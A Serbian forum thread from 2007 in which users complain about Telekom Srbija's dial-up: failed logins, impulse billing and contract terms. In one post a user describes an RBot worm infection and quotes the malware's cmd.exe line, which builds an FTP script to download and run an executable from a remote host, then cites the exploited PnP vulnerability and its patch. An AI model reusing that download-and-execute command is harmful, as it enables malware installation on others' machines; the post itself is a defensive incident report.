[ Nabukodonosor @ 18.01.2007. 00:25 ] @
Ponekad se zapitam da li ta firma ume ista da uradi kako treba. Elem, dobio sam onu nadlanu piece-of-shit karticu za flat dial-up (sto je isla uz Zdravka Colica) i od 100 pokusaja, u 98 ne mogu da se prikacim...kaze ono da je los username i pass. Sestra mi kaze da je i kod nje ista situacija. E sad mene nesto zanima....sta je sa ljudima koji placaju njihov flat dialup? Ako od celog meseca oni aktivno mogu da budu na netu 2 sata, zbog toga sto ne mogu da se nakace, zasto ih neko ne tuzi, jer jebiga, platio si ceo mesec, a nikada ne mozes da se prikacis? Sreca pa nisam platio ovo djubre. Mogu da shvatim kada mi izbaci ono "phone line busy....", ali da mi u 98% slucajeva kaze da je los username ili pass....e to mi je malo suludo. Kakva su vasa iskustva?

Znaci totalna anti preporuka!!!
[ Slobodan Milivojevic @ 18.01.2007. 09:19 ] @
Pa koristim po nekad njihov postpaid, i vrlo cesto ne radi, onda ipak resim da se zakacim na drugog provajdera i to radi

Jednom recju Telekom Srbija.
[ m.g @ 19.01.2007. 01:07 ] @
I meni odbija da se nakachi.
Zaista sramota !!!
[ salac_ue @ 19.01.2007. 08:26 ] @
Ista priča i kod mene. Logujem se po 10 minuta.
Zanimljivo da se to dešava posle 21 (naravno jeftinija tarifa), a pre toga radi sasvim normalno.
Ako im na taj način bude radio i adsl, sebali smo se
[ Nabukodonosor @ 19.01.2007. 10:43 ] @
Citat:
Zanimljivo da se to dešava posle 21 (naravno jeftinija tarifa), a pre toga radi sasvim normalno.

Da...evo ja sam se sada prikacio, ali uvece nema pojma.
[ m.g @ 19.01.2007. 17:46 ] @
Svaki pokusaj jedan impuls. Ja sam danas najmanje 20 puta zvao da bi se 3 puta nakacio. Zamislite koliko ljudi ima+ pokusaja +impulsa
[ MilanMilan @ 28.01.2007. 22:26 ] @
I kod mene isto. Jebo sam im kevu - cim mi istekne ovo sto sam dobio na poklon, vracam se Bubi. Nego, ja sam Zdravka aktivirao 26.12., a evo jos uvek mi radi. Jel to neka fora da se automatski produzava, ili sta? Ne bih voleo da to sto ja koristim ovo i dalje znaci produzenje nekog ugovora ili da mi naplate preko telefonskog racuna. Help?

I jos da dodam da mi jos uvek nije uspelo da se ulogujem na webmail, 'ne valja sifra ili ne postoji takav korisnik'. No comment.

[Ovu poruku je menjao MilanMilan dana 28.01.2007. u 23:36 GMT+1]
[ Bhamby @ 29.01.2007. 00:48 ] @
Citat:
... i od 100 pokusaja, u 98 ne mogu da se prikacim ...

Pošalji im mail podrške majci, sestri i sl., kao što sam uradio ja.

I vi ostali.

Citat:
Nego, ja sam Zdravka aktivirao 26.12., a evo jos uvek mi radi.

Uzimajući u obzir o kakvim skotovima se radi, ne bi me čudilo da te "opale" na kraju meseca.

Evo i jedan članak iz časopisa COM, kao prilog za dodatno nerviranje.

[ ton_majstor @ 29.01.2007. 11:16 ] @
Ko se poslednji izloguje, nek ugasi svetlo.

Pozdrav.
[ adelante @ 29.01.2007. 16:02 ] @
Srbija vs Japan :))) gde nadjošte porediti, još u telekomunikacijama :)

A što se tiče Telekomovog dial-upa Pa koliko para toliko muzike, naglo su povećali broj korisnika sa ovim karticama(i ja sam korisnik trenutno iste) a nemaju dovoljno resursa da to isprate kako valja, pitam se samo kako je onima koji plaćaju punu cenu za flat? Svakako nikad nebih koristio Telekomov dial-up u normalnim uslovima(ovu karticu sam dobio). Mada sam zadnja 3 dana uspeo skinuti oko 400 mb sa neta, uglavnom muzike. Naravno u večernjim satima je zaista očajan.
[ calexx @ 29.01.2007. 19:30 ] @
Pa sad, ako Telekom nema resurse, ko ima? Mislim, čuo sam od pouzdanih ljudi da im to ne radi kako bi trebalo, čak i očajno radi ali mislim da pre može da bude da su to loše odradili ili da ih ne interesuje kako to radi (ili možda i hoće da ne radi kako valja). Ja imam dva Čolića ali ih nisam aktivirao, baš ću ovih dana da probam liči li to čemu.
[ avaxxx @ 29.01.2007. 20:42 ] @
Milane, Telekom ti daje jos otprilike 7 dodatnih dana da se odlucis da nastavis sa njihovim dial up-om. Posle ces morati da otidjes u njihovu poslovnicu i da potpises ugovor na 12 meseci od cega ti poklanjaju 2 meseca flat fee interneta. Ukoliko ne zelis, ne moras. Nalog ce ti biti deaktiviran. U slucaju da pozelis jednog dana da koristis ovo isto, nemoj da zaboravis svoj username jer ga Telekom vezuje uz sifru korisnika.
[ goranvuc @ 29.01.2007. 20:57 ] @
Kad smo vec kod PTT-a, evo mog iskustva, tj. zasto sam prestao da koristim njihove usluge i zasto vise nikad necu koristiti njihove usluge (pricamo o internetu).

Imao sam kod njih pre 3-4 godine nalog, kupovao sate (10-20, kako kad, tad mi je to bilo dovoljno) i sve je bilo lepo dok nije pocelo da biva ruzno: primetio sam da mi se sati brzo trose, pa sam to pripisivao svom nemaru ili krivio devojku, dok se to nije pretvorilo u situaciju: ja platim, sutra vec nemam nista - zamislite moje iznenadjenje. Uzmem malo da se raspitam, cujem od jos nekih da im kradu vreme na PTT mail dial-up nalozima, odem da proverim moj log, kad ono - divota! Neko mi je prvo cvakao mesecno po pola sata/sat, pa povecavao, da bi na kraju pojeo celu moju uplatu za jedan dan. Na kraju sam skontao da imaju nekog insajdera koji je dosao do liste user/pass od korisnika i to koristio, a kad mu se prostor suzavao (kako ko skonta promeni lozinku ili predje kod drugog provajdera)s ve je vise krao od ovih sto su ostali, tj. ovih kao ja koji nisu nista sumnjali ...

Hteo sam tada da ih nazovem i da im ... A onda sam rekao sebi "cuvaj zivce, neces vise nista preko njih" i presao na neobee.net koji je tada imao pristojan flat rezim - racunao sam "ako ce neko vec da mi krade, sad moze slobodno"

PTT ????
[ Davor Vlajkovic @ 29.01.2007. 21:07 ] @
[offtopic]

@goranvuc

Preko CP na Neobee.net možeš unapred da definišeš brojeve sa kojih ćeš da se kačiš. Plus, resetovanje passworda je vrlo jednostavno, imaju odličan support.

[/offtopic]

Ako neko hoće da proba Telekomov nadlanu net a nema vaučer, neka mi se javi i daću mu potrebne podatke jer meni ne treba
[ avaxxx @ 29.01.2007. 21:56 ] @
Evo i mog iskustva. Cola mi je bio aktiviran od 16. 12. do 23. januara i u tom periodu sam imao najvise problema prvih nekoliko dana kada sam bio u prilici da se konektujem iz n-tog pokusaja. Kasnije sam bio sasvim zadovoljan uslugom. Realno gledajuci, Telekom bi trebalo da bude jedan od najboljih ISP provajdera jer svi ostali koriste njegovu infrastrukturu. Kako sam uspeo da saznam, svi mi koji smo koristili te greb kartice bili smo, grubo receno, pokusni kunici jer su na taj nacin isprobavali svoju internet mrezu. E sad. 500 dinara za flat pristup mesecno nije mnogo, imajuci na umu da je to jedan od najnizih pristupa netu kod nas. Ali nervira me pomisao da si u obavezi da se vezes sa Telekomom ugovorom na 12 meseci i da uopste ne mozes da pretpostavis kakav ce biti kvalitet pristupa u tom periodu. Nisam se usudio reskirati i ostao sam uz proverene stvari. Imaju jos obraza da reklamiraju najjeftiniji post paid internet kod nas a ne dozvoljavaju drugim provajderima da koriste isti. Strasno. Sta to bese konkurencija?!
[ MilanMilan @ 30.01.2007. 11:54 ] @
Citat:
avaxxx: Milane, Telekom ti daje jos otprilike 7 dodatnih dana da se odlucis da nastavis sa njihovim dial up-om. Posle ces morati da otidjes u njihovu poslovnicu i da potpises ugovor na 12 meseci od cega ti poklanjaju 2 meseca flat fee interneta. Ukoliko ne zelis, ne moras. Nalog ce ti biti deaktiviran. U slucaju da pozelis jednog dana da koristis ovo isto, nemoj da zaboravis svoj username jer ga Telekom vezuje uz sifru korisnika.

Hvala na infou. Naravno da necu da se obavezujem na godinu dana, obzirom da se nadam ADSL-u u najskorije vreme. ;)
[ Nabukodonosor @ 30.01.2007. 12:51 ] @
Citat:
Imaju jos obraza da reklamiraju najjeftiniji post paid internet kod nas a ne dozvoljavaju drugim provajderima da koriste isti.

Jel to onaj broj 042/500500? Ako je tacno ono sto pise na njihovom sajtu, onda je to 21,5 din po satu. Malo mi je to nelogicno, s obzirom da su oni brojevi koji pocinju na 2 skuplji od ovoga. A na sajtu telekoma nemaju tarife za 042 brojeve tako da ne mogu da vidim koliko stvarno kosta sat preko ovog broja koji pocinje na 5. Jel upucen neko?
[ avaxxx @ 30.01.2007. 14:21 ] @
Da to je broj 042500500. Tarifiranje preko tog broja iznosi 1 minut = 1 impuls u jeftinom saobracaju tj. 1 minut= 2 impulsa u skupljem. To znaci da ukoliko provedes na netu kada ti je jeftiniji telefon 1 h, platices 60 impulsa odnosno otprilike 18,22 dinara +PDV. To jeste najjeftiniji post paid, ali samo kada se povezujes na net u vreme jeftinije tarife. Ovde imas sve: http://www.telekom.nadlanu.com...p/dialup.aspx?ac=solo&br=2 P.S. Milane, nisam bas siguran, ali cini mi se da username koji jednom otvoris kod Telekoma koristis kasnije bilo za dial up ili ADSL. Upamti ga.

[Ovu poruku je menjao avaxxx dana 30.01.2007. u 15:41 GMT+1]
[ m.g @ 06.02.2007. 00:23 ] @
Do pre par dana nisam mogao da se konektujem jer mi je izbacivao neispravan pass.

A od pre 2 dana mi izbacuje sledece:

[ maxx @ 06.02.2007. 01:30 ] @
Da li još neko ima problema sa RBot "sojem" virusa?
Ja trenutno koristim Telekom Dialup (nisam siguran da li ovo ima veze sa provajderom) i nedavno mi je Kaspersky Antivirus prijavio tri datoteke:
c:\winows\system32\mysvcc.exe
c:\winows\system32\recsl.exe
c:\winows\system32\salvage.exe

Zabranio sam im pristup i obrisao ih, ali su nastavile da se pojavljuju. I pored KAV!!!
Onda sam pomoću "Process Explorer"-a < http://www.microsoft.com/techn...ndThreads/ProcessExplorer.mspx > probao da vidim ko ih skida i imao sam šta da vidim - lsass.exe
Onda sam video da lsass.exe pokreće cmd.exe, tj. shell sa sledećim parametarom:
Code:
cmd /c echo open recsl.d67e9cggg.info 21 >appmr.dll &echo user mynew slrecd >>appmr.dll &echo binary >>appmr.dll &echo get >>appmr.dll &echo recsl.exe >>appmr.dll &echo recsl.exe >>appmr.dll &echo bye >>appmr.dll &ftp.exe -n -s:appmr.dll &del appmr.dll &recsl.exe

Samo što je svaki put drugi server a izvršna datoteka je ili recsl.exe ili salvage.exe
Iz neutvrđenog razloga datoteke se samo kreiraju, ali su prazne (veličina=0). Verovatno ih KAV "ubije" na vreme.

Zatim sam skinuo "SmartSniff" i zabeležio pakete, zajedno sa ip adresama.
Zanimljivo je da su sve adrese iz Srbije. Uglavnom su adrese 212.200.*.* (razni podprovajderi Telekoma Srbija, da ih sad ne nabrajam) i 213.244.*.* (verat.net).

Potražio sam rešenje na netu i našao da se radi o sledećem problemu:

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1983

"Stack-based buffer overflow in the Plug and Play (PnP) service for Microsoft Windows 2000 and Windows XP Service Pack 1 allows remote attackers to execute arbitrary code via a crafted packet, and local users to gain privileges via a malicious application, as exploited by the Zotob (aka Mytob) worm."

Čije je rešenje:

Security Update for Windows XP (KB899588)

http://www.microsoft.com/downl...15E095E207F&displaylang=en

Skinuo sam dotični Update i pokrenuo ga, a ovo pišem pre restartovanja.

Očekujte "Edit" uskoro.

Takođe, našao sam na netu da je moguće ne dozvoliti korisnicima koji nemaju ovu zakrpu da se povežu na net.
Pitanje za naše provajdere: Šta mislite o tome?

P0Z!
[ avaxxx @ 06.02.2007. 14:36 ] @
Citat:
Do pre par dana nisam mogao da se konektujem jer mi je izbacivao neispravan pass.
Isti je slucaj bio sa mnom. Ukoliko ti je prosao period od 30 dana besplatnog dial up-a, nalog ti je deaktiviran.
[ B4lt4z4r @ 06.02.2007. 14:51 ] @
Ja sam moju aktivirao 20.01 i radi mi bez problema.
Znaci ni jednom mi nije odbilo povezivanje ili nesto slicno..
Cak i uvece cesce koristim internet i to bez problema.
Inace ne koristim njihove usluge,vec usluge inffo.net iz Loznice!
[ AleMar @ 04.03.2007. 10:27 ] @
Kad smo kod Telekomovog Dial-UPa da li je kome stigao račun za telefon posle mesec dana korišćenja njihove usluge? Koristio sam karticu dobijenu uz CD, i konektovao se preko broja 042/12-12-12 što znači da sam koristio Flat-Fee paket, a na "Moj Račun" opciji sam upravo video da sam potrošio ogroman broj impulsa, ali na net idem sa sekundarnog kanala tako da ne mogu da dobijem listing. Ne znam da li će Telekom oduzeti impulse potrošene na njihov internet ili se radi o još jednoj prevari

Evo šta piše za korišćenje broja 042121212 na njihovom sajtu

Citat:
flat fee korisnik poziva broj 042/121212 i upotrebljava personalizovani korisnički nalog (izabrano korisničko ime i lozinku), a korišćenje usluge plaća mesečno u fiksnom iznosu, bez obzira na vreme provedeno na Internetu i ostvareni protok podataka.

Koliko sam ja razumeo mesec dana interneta preko telefona košta ukupno 500 din + PDV ili u slučaju kartice NIKOM NIŠTA za pretplatu + impuls na svaka 2 minuta u skupom saobraćaj, tj. 4 minuta u slabom saobraćaju. Nikako mi nije jasno kako sam onda napravio 10000 impulsa za internet, a nisam bio više od 3-4h dnevno u proseku na netu.

[Ovu poruku je menjao AleMar dana 04.03.2007. u 12:10 GMT+1]
[ maxx @ 04.03.2007. 15:11 ] @
Ma "nikom ništa", sigurno. Ja sam registrovao preko devojkinog LIB,
pa ne mogu trenutno da proverim r@čun, ali javiću ako sam se zeznuo.
Ne verujem da bi nam poklonili mesec dana interneta, pa ga posle
naplatili (iako je to Telekom Srbija).
P0Z!

[ calexx @ 05.03.2007. 02:19 ] @
Citat:
AleMar: Ne znam da li će Telekom oduzeti impulse potrošene na njihov internet ili se radi o još jednoj prevari

Koliko sam ja razumeo mesec dana interneta preko telefona košta ukupno 500 din + PDV ili u slučaju kartice NIKOM NIŠTA za pretplatu + impuls na svaka 2 minuta u skupom saobraćaj, tj. 4 minuta u slabom saobraćaju. Nikako mi nije jasno kako sam onda napravio 10000 impulsa za internet, a nisam bio više od 3-4h dnevno u proseku na netu.
U najgorem slučaju (po tebe) imaš 120 impulsa dnevno ili 3600 za ceo mesec, ako je ovako kako si napisao. Šta znači da ne možeš da dobiješ listing zato što na net ideš sa sekundarnog kanala? Ako već nema listinga, otkud znaš da je napravljeno 10000 impulsa za internet?
Šta znači da Telekom oduzme impulse potrošene na njihov internet?
[ AleMar @ 05.03.2007. 10:32 ] @
Nisam se dobro izrazio, preko telekomovog sajta moguće je pregledati samo listing za primarni kanal na ISDN-u, tj. za onaj broj koji je bio i pre uvođenja ISDN-a. A broj impulsa piše za sve, tako da znam da je u pitanju oko 10000 impulsa. Samo mi ne ide u glavu kako je to moguće, jer sam ranijih meseci koristio dial-up u mnogo većoj meri, a pritom trošio mnogo manje impulsa. Zato me interesuju iskustva i drugih ljudi sa Telekomovim dial-upom, jer dok ga nisam koristio nikada nisam imao sličnih problema.
[ calexx @ 05.03.2007. 13:43 ] @
Pitao sam zato što kod mene prikazuje sve pozive, bez obzira sa kog telefona je bio poziv, samo što ne deli nego ide sve na gomilu. Ja imam dve kartice ali ih nisam aktivirao pa nemam iskustva sa tim. Ako na internetu nema svih poziva, verovatno ih ima na listingu koji možeš da dobiješ u Telekomu pa u svakom slučaju proveri, možda je ipak nešto drugo u pitanju.